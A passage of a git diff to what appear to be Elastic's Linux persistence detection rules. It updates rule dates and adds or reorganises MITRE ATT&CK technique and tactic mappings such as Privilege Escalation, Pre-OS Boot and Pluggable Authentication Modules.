+[[rule.threat.technique]]
+id = "T1542"
+name = "Pre-OS Boot"
+reference = "https://attack.mitre.org/techniques/T1542/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_grub_makeconfig.toml b/rules/linux/persistence_grub_makeconfig.toml
index dc757627521..89ea6d20748 100644
--- a/rules/linux/persistence_grub_makeconfig.toml
+++ b/rules/linux/persistence_grub_makeconfig.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -133,3 +133,16 @@ reference = "https://attack.mitre.org/techniques/T1574/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1542"
+name = "Pre-OS Boot"
+reference = "https://attack.mitre.org/techniques/T1542/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_init_d_file_creation.toml b/rules/linux/persistence_init_d_file_creation.toml
index b4d7276cf08..22fd4882262 100644
--- a/rules/linux/persistence_init_d_file_creation.toml
+++ b/rules/linux/persistence_init_d_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/03/21"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -192,7 +192,30 @@ id = "T1037"
 name = "Boot or Logon Initialization Scripts"
 reference = "https://attack.mitre.org/techniques/T1037/"
+[[rule.threat.technique.subtechnique]]
+id = "T1037.004"
+name = "RC Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/004/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1037.004"
+name = "RC Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/004/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_kde_autostart_modification.toml b/rules/linux/persistence_kde_autostart_modification.toml
index 58550c3b588..b36a4b766fa 100644
--- a/rules/linux/persistence_kde_autostart_modification.toml
+++ b/rules/linux/persistence_kde_autostart_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/06"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -243,6 +243,11 @@ id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
+[[rule.threat.technique.subtechnique]]
+id = "T1547.013"
+name = "XDG Autostart Entries"
+reference = "https://attack.mitre.org/techniques/T1547/013/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/linux/persistence_kernel_driver_load.toml b/rules/linux/persistence_kernel_driver_load.toml
index 0f7b646be9e..88fc5919f2c 100644
--- a/rules/linux/persistence_kernel_driver_load.toml
+++ b/rules/linux/persistence_kernel_driver_load.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/26"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -96,31 +96,49 @@ Kernel modules extend the functionality of the Linux kernel, allowing dynamic lo
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1547.006"
 name = "Kernel Modules and Extensions"
 reference = "https://attack.mitre.org/techniques/T1547/006/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1014"
 name = "Rootkit"
 reference = "https://attack.mitre.org/techniques/T1014/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.006"
+name = "Kernel Modules and Extensions"
+reference = "https://attack.mitre.org/techniques/T1547/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_kernel_driver_load_by_non_root.toml b/rules/linux/persistence_kernel_driver_load_by_non_root.toml
index 9f4a8303937..53ddd96471a 100644
--- a/rules/linux/persistence_kernel_driver_load_by_non_root.toml
+++ b/rules/linux/persistence_kernel_driver_load_by_non_root.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/01/10"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -128,3 +128,21 @@ reference = "https://attack.mitre.org/techniques/T1014/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.006"
+name = "Kernel Modules and Extensions"
+reference = "https://attack.mitre.org/techniques/T1547/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml
index 6a383383172..ad22b980a2a 100644
--- a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml
+++ b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/20"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/13"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -145,3 +145,21 @@ reference = "https://attack.mitre.org/techniques/T1014/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.006"
+name = "Kernel Modules and Extensions"
+reference = "https://attack.mitre.org/techniques/T1547/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_kernel_object_file_creation.toml b/rules/linux/persistence_kernel_object_file_creation.toml
index e5b8aede59e..23f7580610a 100644
--- a/rules/linux/persistence_kernel_object_file_creation.toml
+++ b/rules/linux/persistence_kernel_object_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/12/19"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -138,6 +138,23 @@ id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.006"
+name = "Kernel Modules and Extensions"
+reference = "https://attack.mitre.org/techniques/T1547/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.name", "file.name"]
diff --git a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml
index 59a33614ada..a5c2e7e965b 100644
--- a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml
+++ b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/05"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -111,6 +111,16 @@ file where host.os.type == "linux" and event.type != "deletion" and file.path li
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1053"
+name = "Scheduled Task/Job"
+reference = "https://attack.mitre.org/techniques/T1053/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1053.007"
+name = "Container Orchestration Job"
+reference = "https://attack.mitre.org/techniques/T1053/007/"
+
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
@@ -121,17 +131,38 @@ id = "T1543.005"
 name = "Container Service"
 reference = "https://attack.mitre.org/techniques/T1543/005/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1053"
-name = "Scheduled Task/Job"
-reference = "https://attack.mitre.org/techniques/T1053/"
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
 [[rule.threat.technique.subtechnique]]
-id = "T1053.007"
-name = "Container Orchestration Job"
-reference = "https://attack.mitre.org/techniques/T1053/007/"
+id = "T1543.005"
+name = "Container Service"
+reference = "https://attack.mitre.org/techniques/T1543/005/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_kworker_file_creation.toml b/rules/linux/persistence_kworker_file_creation.toml
index 428a388aa15..3d1b0170edc 100644
--- a/rules/linux/persistence_kworker_file_creation.toml
+++ b/rules/linux/persistence_kworker_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/26"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -199,6 +199,16 @@ id = "T1014"
 name = "Rootkit"
 reference = "https://attack.mitre.org/techniques/T1014/"
+[[rule.threat.technique]]
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/persistence_linux_backdoor_user_creation.toml b/rules/linux/persistence_linux_backdoor_user_creation.toml
index fde1a2aa627..b1e668e6188 100644
--- a/rules/linux/persistence_linux_backdoor_user_creation.toml
+++ b/rules/linux/persistence_linux_backdoor_user_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/03/07"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -146,6 +146,11 @@ process.args in ("-o", "--non-unique")
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
@@ -160,3 +165,16 @@ reference = "https://attack.mitre.org/techniques/T1136/001/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_linux_group_creation.toml b/rules/linux/persistence_linux_group_creation.toml
index 1a5ec523679..fc60a928539 100644
--- a/rules/linux/persistence_linux_group_creation.toml
+++ b/rules/linux/persistence_linux_group_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/13"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -119,6 +119,16 @@ iam where host.os.type == "linux" and event.type == "group" and event.type == "c
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.007"
+name = "Additional Local or Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1098/007/"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
diff --git a/rules/linux/persistence_linux_shell_activity_via_web_server.toml b/rules/linux/persistence_linux_shell_activity_via_web_server.toml
index e3267bc31b1..31e0f60e16f 100644
--- a/rules/linux/persistence_linux_shell_activity_via_web_server.toml
+++ b/rules/linux/persistence_linux_shell_activity_via_web_server.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/03/04"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -206,3 +206,16 @@ reference = "https://attack.mitre.org/techniques/T1190/"
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/persistence_linux_user_added_to_privileged_group.toml b/rules/linux/persistence_linux_user_added_to_privileged_group.toml
index 10ff2785c87..f171e2760a4 100644
--- a/rules/linux/persistence_linux_user_added_to_privileged_group.toml
+++ b/rules/linux/persistence_linux_user_added_to_privileged_group.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/13"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -143,6 +143,16 @@ process.executable != null and process.args in (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.007"
+name = "Additional Local or Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1098/007/"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
@@ -157,3 +167,21 @@ reference = "https://attack.mitre.org/techniques/T1136/001/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.007"
+name = "Additional Local or Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1098/007/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_manual_dracut_execution.toml b/rules/linux/persistence_manual_dracut_execution.toml
index 0afee6bda3f..a12b34a2ed0 100644
--- a/rules/linux/persistence_manual_dracut_execution.toml
+++ b/rules/linux/persistence_manual_dracut_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -143,3 +143,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1542"
+name = "Pre-OS Boot"
+reference = "https://attack.mitre.org/techniques/T1542/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_message_of_the_day_creation.toml b/rules/linux/persistence_message_of_the_day_creation.toml
index 32d08cc31f9..dc73a9eff56 100644
--- a/rules/linux/persistence_message_of_the_day_creation.toml
+++ b/rules/linux/persistence_message_of_the_day_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/28"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -183,3 +183,16 @@ reference = "https://attack.mitre.org/techniques/T1037/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_message_of_the_day_execution.toml b/rules/linux/persistence_message_of_the_day_execution.toml
index 4e5c181f2dd..2d176a1d6ac 100644
--- a/rules/linux/persistence_message_of_the_day_execution.toml
+++ b/rules/linux/persistence_message_of_the_day_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/28"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -209,3 +209,44 @@ reference = "https://attack.mitre.org/techniques/T1037/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.011"
+name = "Lua"
+reference = "https://attack.mitre.org/techniques/T1059/011/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_network_manager_dispatcher_persistence.toml b/rules/linux/persistence_network_manager_dispatcher_persistence.toml
index 089f1d5d144..55a144cda53 100644
--- a/rules/linux/persistence_network_manager_dispatcher_persistence.toml
+++ b/rules/linux/persistence_network_manager_dispatcher_persistence.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/01/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -130,6 +130,11 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
diff --git a/rules/linux/persistence_openssl_passwd_hash_generation.toml b/rules/linux/persistence_openssl_passwd_hash_generation.toml
index dc7660861c7..df808750868 100644
--- a/rules/linux/persistence_openssl_passwd_hash_generation.toml
+++ b/rules/linux/persistence_openssl_passwd_hash_generation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -111,6 +111,11 @@ not process.args in ("-help", "--help", "-h")
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
diff --git a/rules/linux/persistence_pluggable_authentication_module_creation.toml b/rules/linux/persistence_pluggable_authentication_module_creation.toml
index a5bebae77f2..8de1e62712a 100644
--- a/rules/linux/persistence_pluggable_authentication_module_creation.toml
+++ b/rules/linux/persistence_pluggable_authentication_module_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/06"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -123,6 +123,16 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.003"
+name = "Pluggable Authentication Modules"
+reference = "https://attack.mitre.org/techniques/T1556/003/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
@@ -136,6 +146,11 @@ id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
+[[rule.threat.technique.subtechnique]]
+id = "T1556.003"
+name = "Pluggable Authentication Modules"
+reference = "https://attack.mitre.org/techniques/T1556/003/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
diff --git a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml
index 2505889ddd7..2323b6fef5d 100644
--- a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml
+++ b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/12/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -105,6 +105,16 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.003"
+name = "Pluggable Authentication Modules"
+reference = "https://attack.mitre.org/techniques/T1556/003/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
@@ -118,6 +128,11 @@ id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
+[[rule.threat.technique.subtechnique]]
+id = "T1556.003"
+name = "Pluggable Authentication Modules"
+reference = "https://attack.mitre.org/techniques/T1556/003/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
diff --git a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml
index 57331335bcc..381f170f42b 100644
--- a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml
+++ b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/29"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -110,6 +110,16 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.003"
+name = "Pluggable Authentication Modules"
+reference = "https://attack.mitre.org/techniques/T1556/003/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
@@ -127,3 +137,16 @@ reference = "https://attack.mitre.org/techniques/T1556/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/persistence_pluggable_authentication_module_source_download.toml b/rules/linux/persistence_pluggable_authentication_module_source_download.toml
index 458326e408c..aad0bc8bc5b 100644
--- a/rules/linux/persistence_pluggable_authentication_module_source_download.toml
+++ b/rules/linux/persistence_pluggable_authentication_module_source_download.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/12/16"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -102,7 +102,25 @@ id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
+[[rule.threat.technique.subtechnique]]
+id = "T1556.003"
+name = "Pluggable Authentication Modules"
+reference = "https://attack.mitre.org/techniques/T1556/003/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/persistence_polkit_policy_creation.toml b/rules/linux/persistence_polkit_policy_creation.toml
index 0735fde6ca8..a80b58af304 100644
--- a/rules/linux/persistence_polkit_policy_creation.toml
+++ b/rules/linux/persistence_polkit_policy_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -114,6 +114,11 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
@@ -131,3 +136,16 @@ reference = "https://attack.mitre.org/techniques/T1556/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml
index ada832ab5a8..f8a376964ac 100644
--- a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml
+++ b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml
@@ -2,7 +2,7 @@
